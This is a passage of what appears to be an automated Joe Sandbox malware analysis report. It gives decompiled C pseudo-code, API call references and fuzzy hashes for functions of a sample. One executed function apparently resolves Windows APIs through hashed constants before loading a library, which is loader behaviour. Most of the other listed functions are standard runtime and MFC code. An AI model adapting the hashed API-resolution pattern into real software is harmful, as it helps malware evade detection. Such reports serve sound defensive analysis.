                                                      				char _t10;
                                                      				void* _t11;
                                                      				intOrPtr _t14;
                                                      				void* _t15;
                                                      				void* _t24;
                                                      				signed int _t25;
                                                      				WCHAR* _t27;
                                                      				void* _t28;
                                                      
                                                      				_t25 = __edx;
                                                      				_t27 = E02302674(_t11);
                                                      				E02302F84(0xf568ce83, 0xeaf577de, 0x134);
                                                      				_t6 = LoadLibraryW(_t27);
                                                      				_t14 =  *0x230a4c0; // 0x5b18c0
                                                      				 *(_t14 + 4 + _t25 * 4) = _t6;
                                                      				_t15 = _t27;
                                                      				_t28 = _t24;
                                                      				_push(_t28);
                                                      				_t8 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x71eb2479, 0x14d)))();
                                                      				E02302F84(0xf568ce83, 0x5e575f04, 0x1e3);
                                                      				_t10 = RtlFreeHeap(_t8, 0, _t15); // executed
                                                      				return _t10;
                                                      			}

                                                      APIs
                                                      • LoadLibraryW.KERNELBASE(00000000,33CEB415,1925BE3B,02305091,?,2895FB0B,?,?,02304CDA), ref: 02304F97
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 43d06233a81e8fb32d1735a1f7cdb06edf2d30d5a698d5985b33bdba4466e69c
                                                      • Instruction ID: 356bcd4b1cecd6524f8e0b30ea88280be7ce8d1b7050d2a4214e935aae28454f
                                                      • Opcode Fuzzy Hash: 43d06233a81e8fb32d1735a1f7cdb06edf2d30d5a698d5985b33bdba4466e69c
                                                      • Instruction Fuzzy Hash: DBD0A7257453215BC268EA7978AC95B66ABDFC93E5B14453AD91DCB7C0CE70CC02C7B0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 022E182F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: a4df8ff0dab7dea93342202d8f6e3dbe808f357e778907587f4c6bec63147848
                                                      • Instruction ID: e552d3bf741cdae945ade2abef543379257dba56f07d079e4ffe55ab5d946d6b
                                                      • Opcode Fuzzy Hash: a4df8ff0dab7dea93342202d8f6e3dbe808f357e778907587f4c6bec63147848
                                                      • Instruction Fuzzy Hash: BFC04C7A55420CEB8B04DFD8E884DAB37ADBB8C711B048948BA1D87200C630F9109BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      C-Code - Quality: 88%
                                                      			E00410555(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* __ebp;
                                                      				signed int _t38;
                                                      				long _t49;
                                                      				CHAR* _t50;
                                                      				CHAR* _t56;
                                                      				CHAR* _t59;
                                                      				void* _t61;
                                                      				int _t65;
                                                      				CHAR* _t74;
                                                      				void* _t75;
                                                      				void* _t76;
                                                      				void* _t89;
                                                      				void* _t90;
                                                      				CHAR* _t92;
                                                      				void* _t93;
                                                      				void* _t96;
                                                      				struct _WIN32_FIND_DATAA* _t98;
                                                      				void* _t100;
                                                      				CHAR* _t106;
                                                      
                                                      				_t94 = __esi;
                                                      				_t90 = __edx;
                                                      				_t76 = __ecx;
                                                      				_t98 = _t100 - 0x13c;
                                                      				_t38 =  *0x443590; // 0x8ffedb05
                                                      				 *(_t98 + 0x140) = _t38 ^ _t98;
                                                      				_push(0x14);
                                                      				E0041F6EA(E0043298A, __ebx, __edi, __esi);
                                                      				_t92 =  *(_t98 + 0x14c);
                                                      				_t74 =  *(_t98 + 0x150);
                                                      				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
                                                      				_t106 = _t92;
                                                      				_t107 = _t106 == 0;
                                                      				if(_t106 == 0) {
                                                      					L1:
                                                      					E004037E3(_t74, _t76, _t92, _t94, _t107);
                                                      				}
                                                      				if((0 | _t74 != 0x00000000) == 0) {
                                                      					goto L1;
                                                      				}
                                                      				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
                                                      				if(_t49 != 0) {
                                                      					__eflags = _t49 - 0x104;
                                                      					if(_t49 >= 0x104) {
                                                      						goto L5;
                                                      					} else {
                                                      						E0040320E(_t98 - 0x10, E0040EA5E());
                                                      						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                                                      						E0041038B(_t74, _t98, __eflags, _t92, _t98 - 0x10);
                                                      						_t56 = PathIsUNCA( *(_t98 - 0x10));
                                                      						__eflags = _t56;
                                                      						if(_t56 != 0) {
                                                      							L19:
                                                      							E00403036( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                      							_t50 = 1;
                                                      							__eflags = 1;
                                                      						} else {
                                                      							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
                                                      							__eflags = _t59;
                                                      							if(_t59 != 0) {
                                                      								__eflags =  *(_t98 - 0x1c) & 0x00000002;
                                                      								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
                                                      									CharUpperA(_t92);
                                                      								}
                                                      								__eflags =  *(_t98 - 0x1c) & 0x00000004;
                                                      								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
                                                      									goto L19;
                                                      								} else {
                                                      									_t61 = FindFirstFileA(_t74, _t98);
                                                      									__eflags = _t61 - 0xffffffff;
                                                      									if(_t61 == 0xffffffff) {
                                                      										goto L19;
                                                      									} else {
                                                      										FindClose(_t61);
                                                      										__eflags =  *(_t98 - 0x14);
                                                      										if( *(_t98 - 0x14) == 0) {
                                                      											goto L10;
                                                      										} else {
                                                      											__eflags =  *(_t98 - 0x14) - _t92;
                                                      											if( *(_t98 - 0x14) <= _t92) {
                                                      												goto L10;
                                                      											} else {
                                                      												_t65 = lstrlenA( &(_t98->cFileName));
                                                      												_t89 =  *(_t98 - 0x14) - _t92;
                                                      												__eflags = _t65 + _t89 - 0x104;
                                                      												if(_t65 + _t89 >= 0x104) {
                                                      													goto L10;
                                                      												} else {
                                                      													_t97 = 0x104 - _t89;
                                                      													__eflags = 0x104 - _t89;
                                                      													E00403EBB(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
                                                      													goto L19;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							} else {
                                                      								_push(_t74);
                                                      								E0041052A( *((intOrPtr*)(_t98 - 0x18)));
                                                      								L10:
                                                      								E00403036( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                      								goto L5;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					E00402FE8(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
                                                      					_push(_t74);
                                                      					E0041052A( *((intOrPtr*)(_t98 - 0x18)));
                                                      					L5:
                                                      					_t50 = 0;
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
                                                      				_pop(_t93);
                                                      				_pop(_t96);
                                                      				_pop(_t75);
                                                      				return E0041E5DF(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
                                                      			}

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00410574
                                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 004105B5
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • PathIsUNCA.SHLWAPI(?,00000000), ref: 004105FF
                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041061D
                                                      • CharUpperA.USER32(?), ref: 00410644
                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 00410655
                                                      • FindClose.KERNEL32(00000000), ref: 00410661
                                                      • lstrlenA.KERNEL32(?), ref: 00410676
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                      • String ID:
                                                      • API String ID: 4099955704-0
                                                      • Opcode ID: 8d423071c246daf2073a97ce94b957f1acc84d53f3ea7e5e8a4362d51d6eacf4
                                                      • Instruction ID: c95776d52dd1443ee05a1ca64a85c65a6502b148270e7fb7a51c131ffc65af19
                                                      • Opcode Fuzzy Hash: 8d423071c246daf2073a97ce94b957f1acc84d53f3ea7e5e8a4362d51d6eacf4
                                                      • Instruction Fuzzy Hash: EE41A17190010AABDB21EFA5CC45BFF777DEF54318F00052AF815E2291EB789995CA68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E0041E5DF(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                      				intOrPtr _v0;
                                                      				void* _v804;
                                                      				intOrPtr _v808;
                                                      				intOrPtr _v812;
                                                      				intOrPtr _t6;
                                                      				intOrPtr _t11;
                                                      				intOrPtr _t12;
                                                      				intOrPtr _t13;
                                                      				long _t17;
                                                      				intOrPtr _t21;
                                                      				intOrPtr _t22;
                                                      				intOrPtr _t25;
                                                      				intOrPtr _t26;
                                                      				intOrPtr _t27;
                                                      				intOrPtr* _t31;
                                                      				void* _t34;
                                                      
                                                      				_t27 = __esi;
                                                      				_t26 = __edi;
                                                      				_t25 = __edx;
                                                      				_t22 = __ecx;
                                                      				_t21 = __ebx;
                                                      				_t6 = __eax;
                                                      				_t34 = _t22 -  *0x443590; // 0x8ffedb05
                                                      				if(_t34 == 0) {
                                                      					asm("repe ret");
                                                      				}
                                                      				 *0x446b48 = _t6;
                                                      				 *0x446b44 = _t22;
                                                      				 *0x446b40 = _t25;
                                                      				 *0x446b3c = _t21;
                                                      				 *0x446b38 = _t27;
                                                      				 *0x446b34 = _t26;
                                                      				 *0x446b60 = ss;
                                                      				 *0x446b54 = cs;
                                                      				 *0x446b30 = ds;
                                                      				 *0x446b2c = es;
                                                      				 *0x446b28 = fs;
                                                      				 *0x446b24 = gs;
                                                      				asm("pushfd");
                                                      				_pop( *0x446b58);
                                                      				 *0x446b4c =  *_t31;
                                                      				 *0x446b50 = _v0;
                                                      				 *0x446b5c =  &_a4;
                                                      				 *0x446a98 = 0x10001;
                                                      				_t11 =  *0x446b50; // 0x0
                                                      				 *0x446a4c = _t11;
                                                      				 *0x446a40 = 0xc0000409;
                                                      				 *0x446a44 = 1;
                                                      				_t12 =  *0x443590; // 0x8ffedb05
                                                      				_v812 = _t12;
                                                      				_t13 =  *0x443594; // 0x700124fa
                                                      				_v808 = _t13;
                                                      				 *0x446a90 = IsDebuggerPresent();
                                                      				_push(1);
                                                      				E0042BADB(_t14);
                                                      				SetUnhandledExceptionFilter(0);
                                                      				_t17 = UnhandledExceptionFilter("@jD");
                                                      				if( *0x446a90 == 0) {
                                                      					_push(1);
                                                      					E0042BADB(_t17);
                                                      				}
                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                      			}

                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 00424CB5
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00424CCA
                                                      • UnhandledExceptionFilter.KERNEL32(@jD), ref: 00424CD5
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00424CF1
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00424CF8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                      • String ID: @jD
                                                      • API String ID: 2579439406-1635275382
                                                      • Opcode ID: c447d9a5082a45e17c64b574762009e2935f38cb7a259609e812312e6fb4b33c
                                                      • Instruction ID: 353eb8598e0df34b4eb95eb5e3ae3fd6c07366769aae313645bd4fdf51cf0d1b
                                                      • Opcode Fuzzy Hash: c447d9a5082a45e17c64b574762009e2935f38cb7a259609e812312e6fb4b33c
                                                      • Instruction Fuzzy Hash: 6D21F2BC5007A09FC711DF59FC496847BA0FB1B308F52543AE908D3661E7B465848F0E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00402130(intOrPtr __ecx) {
                                                      				int _v8;
                                                      				int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				char _v28;
                                                      				signed int _v32;
                                                      				struct HDC__* _v120;
                                                      				char _v124;
                                                      				int _v128;
                                                      				int _v132;
                                                      				int _v136;
                                                      				struct HICON__* _v140;
                                                      				intOrPtr _v144;
                                                      				void* __ebp;
                                                      				signed int _t37;
                                                      				int _t40;
                                                      				intOrPtr _t41;
                                                      				intOrPtr _t66;
                                                      				struct tagRECT* _t82;
                                                      				intOrPtr _t84;
                                                      				intOrPtr _t85;
                                                      				signed int _t86;
                                                      
                                                      				_t37 =  *0x443590; // 0x8ffedb05
                                                      				_v32 = _t37 ^ _t86;
                                                      				_v144 = __ecx;
                                                      				_t40 = IsIconic( *(_v144 + 0x20));
                                                      				_t87 = _t40;
                                                      				if(_t40 == 0) {
                                                      					_t41 = E00405C6C(_t66, _v144, _t84, _t85, __eflags);
                                                      				} else {
                                                      					_push(_v144);
                                                      					E0040E7ED(_t66,  &_v124, _t84, _t85, _t87);
                                                      					_t88 =  &_v124;
                                                      					if( &_v124 != 0) {
                                                      						_v136 = _v120;
                                                      					} else {
                                                      						_v136 = 0;
                                                      					}
                                                      					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
                                                      					_v128 = GetSystemMetrics(0xb);
                                                      					_v132 = GetSystemMetrics(0xc);
                                                      					_t82 =  &_v28;
                                                      					GetClientRect( *(_v144 + 0x20), _t82);
                                                      					asm("cdq");
                                                      					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
                                                      					asm("cdq");
                                                      					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
                                                      					_v140 =  *((intOrPtr*)(_v144 + 0x74));
                                                      					_t79 = _v8;
                                                      					DrawIcon(_v120, _v12, _v8, _v140);
                                                      					_t41 = E0040E841(_t66,  &_v124, _t84, _t85, _t88);
                                                      				}
                                                      				return E0041E5DF(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
                                                      			}

                                                      APIs
                                                      • IsIconic.USER32(?), ref: 00402153
                                                        • Part of subcall function 0040E7ED: __EH_prolog3.LIBCMT ref: 0040E7F4
                                                        • Part of subcall function 0040E7ED: BeginPaint.USER32(?,?,00000004,00405C83,?,00000058,00402236), ref: 0040E820
                                                      • SendMessageA.USER32(?,00000027,?,00000000), ref: 004021A1
                                                      • GetSystemMetrics.USER32 ref: 004021A9
                                                      • GetSystemMetrics.USER32 ref: 004021B4
                                                      • GetClientRect.USER32 ref: 004021CB
                                                      • DrawIcon.USER32 ref: 0040221B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                                                      • String ID:
                                                      • API String ID: 1007970657-0
                                                      • Opcode ID: 2f6cd35a6b9dfaeb7081f42fbc75d1cf632e4bdf7bd37a2e3ba394ddb8d91dbc
                                                      • Instruction ID: 239a3fe864a438b672b26ed0143a2d062fb3f574ffa283ab5bdaab9dccb6ddd8
                                                      • Opcode Fuzzy Hash: 2f6cd35a6b9dfaeb7081f42fbc75d1cf632e4bdf7bd37a2e3ba394ddb8d91dbc
                                                      • Instruction Fuzzy Hash: 80311D75A00109DFDB14DFB8D985FAEBBB5BF48304F1082A9E549E7281DA30A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E0040A094(void* __ecx) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed int _t5;
                                                      				void* _t15;
                                                      				void* _t18;
                                                      				void* _t19;
                                                      
                                                      				_t15 = __ecx;
                                                      				if((E0040C981(__ecx) & 0x40000000) != 0) {
                                                      					L6:
                                                      					_t5 = E00409BF3(_t15, _t15, _t18, __eflags);
                                                      					asm("sbb eax, eax");
                                                      					return  ~( ~_t5);
                                                      				}
                                                      				_t19 = E00403ED6();
                                                      				if(_t19 == 0) {
                                                      					goto L6;
                                                      				}
                                                      				_t18 = GetKeyState;
                                                      				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                                      					goto L6;
                                                      				} else {
                                                      					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
                                                      					return 1;
                                                      				}
                                                      			}

                                                      APIs
                                                        • Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C
                                                      • GetKeyState.USER32(00000010), ref: 0040A0B8
                                                      • GetKeyState.USER32(00000011), ref: 0040A0C1
                                                      • GetKeyState.USER32(00000012), ref: 0040A0CA
                                                      • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0040A0E0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: State$LongMessageSendWindow
                                                      • String ID:
                                                      • API String ID: 1063413437-0
                                                      • Opcode ID: 809d64707c866a6fea6fdfe0c08dbe96b0f4bf706804fe5c5b589de44f277889
                                                      • Instruction ID: 09be2279584ced2a5f59b9ad430127016d441750cd54d9fdae9847761112cc12
                                                      • Opcode Fuzzy Hash: 809d64707c866a6fea6fdfe0c08dbe96b0f4bf706804fe5c5b589de44f277889
                                                      • Instruction Fuzzy Hash: 2CF0277234034E27EA207A764C41FEB71145F92BD8F018A3AB742FB1D1C9B9D812667A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00424996(void* __ebx) {
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				_Unknown_base(*)()* _t7;
                                                      				long _t10;
                                                      				void* _t11;
                                                      				int _t12;
                                                      				void* _t18;
                                                      				intOrPtr _t21;
                                                      				long _t26;
                                                      				void* _t30;
                                                      				struct HINSTANCE__* _t37;
                                                      				void* _t40;
                                                      				void* _t42;
                                                      
                                                      				_t30 = __ebx;
                                                      				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                      				if(_t37 != 0) {
                                                      					 *0x446a2c = GetProcAddress(_t37, "FlsAlloc");
                                                      					 *0x446a30 = GetProcAddress(_t37, "FlsGetValue");
                                                      					 *0x446a34 = GetProcAddress(_t37, "FlsSetValue");
                                                      					_t7 = GetProcAddress(_t37, "FlsFree");
                                                      					__eflags =  *0x446a2c;
                                                      					_t40 = TlsSetValue;
                                                      					 *0x446a38 = _t7;
                                                      					if( *0x446a2c == 0) {
                                                      						L6:
                                                      						 *0x446a30 = TlsGetValue;
                                                      						 *0x446a2c = E004246B6;
                                                      						 *0x446a34 = _t40;
                                                      						 *0x446a38 = TlsFree;
                                                      					} else {
                                                      						__eflags =  *0x446a30;
                                                      						if( *0x446a30 == 0) {
                                                      							goto L6;
                                                      						} else {
                                                      							__eflags =  *0x446a34;
                                                      							if( *0x446a34 == 0) {
                                                      								goto L6;
                                                      							} else {
                                                      								__eflags = _t7;
                                                      								if(_t7 == 0) {
                                                      									goto L6;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					_t10 = TlsAlloc();
                                                      					__eflags = _t10 - 0xffffffff;
                                                      					 *0x4438c0 = _t10;
                                                      					if(_t10 == 0xffffffff) {
                                                      						L15:
                                                      						_t11 = 0;
                                                      						__eflags = 0;
                                                      					} else {
                                                      						_t12 = TlsSetValue(_t10,  *0x446a30);
                                                      						__eflags = _t12;
                                                      						if(_t12 == 0) {
                                                      							goto L15;
                                                      						} else {
                                                      							E0041FBD2();
                                                      							 *0x446a2c = E004245E7( *0x446a2c);
                                                      							 *0x446a30 = E004245E7( *0x446a30);
                                                      							 *0x446a34 = E004245E7( *0x446a34);
                                                      							 *0x446a38 = E004245E7( *0x446a38);
                                                      							_t18 = E00422CB7();
                                                      							__eflags = _t18;
                                                      							if(_t18 == 0) {
                                                      								L14:
                                                      								E004246E9();
                                                      								goto L15;
                                                      							} else {
                                                      								_push(E00424875);
                                                      								_t21 =  *((intOrPtr*)(E00424653( *0x446a2c)))();
                                                      								__eflags = _t21 - 0xffffffff;
                                                      								 *0x4438bc = _t21;
                                                      								if(_t21 == 0xffffffff) {
                                                      									goto L14;
                                                      								} else {
                                                      									_t42 = E004265A8(1, 0x214);
                                                      									__eflags = _t42;
                                                      									if(_t42 == 0) {
                                                      										goto L14;
                                                      									} else {
                                                      										_push(_t42);
                                                      										_push( *0x4438bc);
                                                      										__eflags =  *((intOrPtr*)(E00424653( *0x446a34)))();
                                                      										if(__eflags == 0) {
                                                      											goto L14;
                                                      										} else {
                                                      											_push(0);
                                                      											_push(_t42);
                                                      											E00424726(_t30, _t37, _t42, __eflags);
                                                      											_t26 = GetCurrentThreadId();
                                                      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                      											 *_t42 = _t26;
                                                      											_t11 = 1;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					return _t11;
                                                      				} else {
                                                      					E004246E9();
                                                      					return 0;
                                                      				}
                                                      			}

















                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041F5CD), ref: 0042499C
                                                      • __mtterm.LIBCMT ref: 004249A8
                                                        • Part of subcall function 004246E9: __decode_pointer.LIBCMT ref: 004246FA
                                                        • Part of subcall function 004246E9: TlsFree.KERNEL32(00000020,00424B15), ref: 00424714
                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004249BE
                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004249CB
                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004249D8
                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004249E5
                                                      • TlsAlloc.KERNEL32 ref: 00424A35
                                                      • TlsSetValue.KERNEL32(00000000), ref: 00424A50
                                                      • __init_pointers.LIBCMT ref: 00424A5A
                                                      • __encode_pointer.LIBCMT ref: 00424A65
                                                      • __encode_pointer.LIBCMT ref: 00424A75
                                                      • __encode_pointer.LIBCMT ref: 00424A85
                                                      • __encode_pointer.LIBCMT ref: 00424A95
                                                      • __decode_pointer.LIBCMT ref: 00424AB6
                                                      • __calloc_crt.LIBCMT ref: 00424ACF
                                                      • __decode_pointer.LIBCMT ref: 00424AE9
                                                      • __initptd.LIBCMT ref: 00424AF8
                                                      • GetCurrentThreadId.KERNEL32 ref: 00424AFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                      • API String ID: 2657569430-3819984048
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041CD37(intOrPtr* __ecx) {
                                                      				intOrPtr* _t27;
                                                      
                                                      				_t27 = __ecx;
                                                      				 *_t27 = RegisterClipboardFormatA("Native");
                                                      				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
                                                      				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
                                                      				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                                                      				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                                                      				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
                                                      				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                                                      				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                                                      				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
                                                      				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                                                      				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                                                      				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                                                      				return _t27;
                                                      			}





                                                      APIs
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD46
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD4F
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD59
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD63
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD6D
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD77
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD81
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD8B
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD95
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD9F
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CDA9
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CDB3
                                                      Strings
                                                      Similarity
                                                      • API ID: ClipboardFormatRegister
                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                      • API String ID: 1228543026-2889995556
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E0041C757(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t190;
                                                      				intOrPtr* _t200;
                                                      				signed int _t203;
                                                      				signed int _t206;
                                                      				intOrPtr* _t208;
                                                      				intOrPtr _t211;
                                                      				char _t230;
                                                      				CHAR* _t236;
                                                      				intOrPtr _t237;
